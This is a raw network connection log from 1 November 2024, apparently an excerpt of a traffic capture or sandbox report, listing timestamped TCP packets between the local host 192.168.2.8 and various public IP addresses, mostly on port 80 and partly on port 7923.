                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.140254974 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.606256008 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.607883930 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.613692999 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.615333080 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.791680098 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.795890093 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.801295042 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.801630020 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.814033031 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.819164038 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.822611094 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.822865009 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.822880983 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.827682018 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.827697039 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.834686041 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839615107 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839684963 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839945078 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839977980 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.844829082 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.844844103 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.498615026 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.498888016 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.504190922 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.506274939 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.509543896 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.510360003 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.515752077 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.515813112 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.525234938 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.530112028 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.531693935 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.531856060 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.531881094 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.536802053 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.536817074 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.706212997 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711267948 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711338997 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711550951 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711631060 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.716603041 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.716619968 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.508433104 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.513807058 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.513876915 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.513986111 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.514015913 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.518872976 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.519779921 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.695442915 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.701298952 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.706135035 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.756603003 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.758282900 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.763262033 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.845956087 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.848151922 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.853146076 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.283673048 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.283883095 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.289797068 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.291366100 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.329498053 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.329664946 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.335005999 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.335076094 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.346626997 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352458000 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352535963 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352694035 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.352716923 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.357701063 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.358259916 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.467418909 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472524881 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472599983 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472774029 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.472798109 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.477592945 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.477663994 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.195267916 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.195533991 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.200665951 CET805018534.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.202168941 CET5018580192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.313328028 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.313810110 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.318960905 CET805018634.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.319029093 CET5018680192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.401756048 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406734943 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406821966 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406971931 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.406971931 CET5018780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.411730051 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.411741972 CET805018718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.650031090 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655145884 CET805018834.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655272007 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655602932 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.655658960 CET5018880192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.391422033 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.396944046 CET805019247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.398384094 CET5019280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.436954021 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.439810038 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.445437908 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.518237114 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.524172068 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.590153933 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595283031 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595582008 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595698118 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.595714092 CET5019580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.600689888 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.600702047 CET805019513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.674500942 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.679461956 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.861948013 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.957726002 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.957994938 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.959728003 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.960453033 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.964699984 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.965053082 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.970526934 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.986938000 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.991746902 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.050311089 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.051785946 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.056873083 CET805019454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.059696913 CET5019480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.069464922 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.074398041 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.075701952 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.075829983 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.075855970 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.080672026 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.080682993 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.143199921 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.148073912 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.218338013 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.229253054 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.229321003 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.231794119 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.236670971 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.562089920 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.562370062 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.563649893 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.568708897 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.568793058 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.573580027 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.919962883 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.920444012 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.925579071 CET805019635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.925807953 CET5019680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.935791016 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.940623999 CET805019754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.941833019 CET5019780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.323693037 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.324048996 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.329878092 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.329926968 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.342546940 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347562075 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347700119 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347809076 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347839117 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.352659941 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.352684975 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361429930 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361592054 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361612082 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361623049 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361692905 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.366379976 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.376045942 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.380839109 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.380902052 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.381017923 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.381040096 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.385889053 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.385900974 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.427607059 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.427813053 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.433074951 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.433144093 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.492721081 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497622013 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497713089 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497843981 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497869968 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.502688885 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.502700090 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.040590048 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.041955948 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.047092915 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.047153950 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.059436083 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064306974 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064373970 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064702034 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064724922 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.069550991 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.069561958 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.165306091 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.165868044 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.171124935 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.173894882 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.597382069 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.602356911 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.605546951 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.606090069 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.606137037 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.610905886 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.610918999 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.736860037 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.877743959 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.882610083 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.882639885 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.093806982 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.095813990 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.101229906 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.103704929 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.468838930 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.473928928 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.474124908 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.474240065 CET5021780192.168.2.847.129.31.212
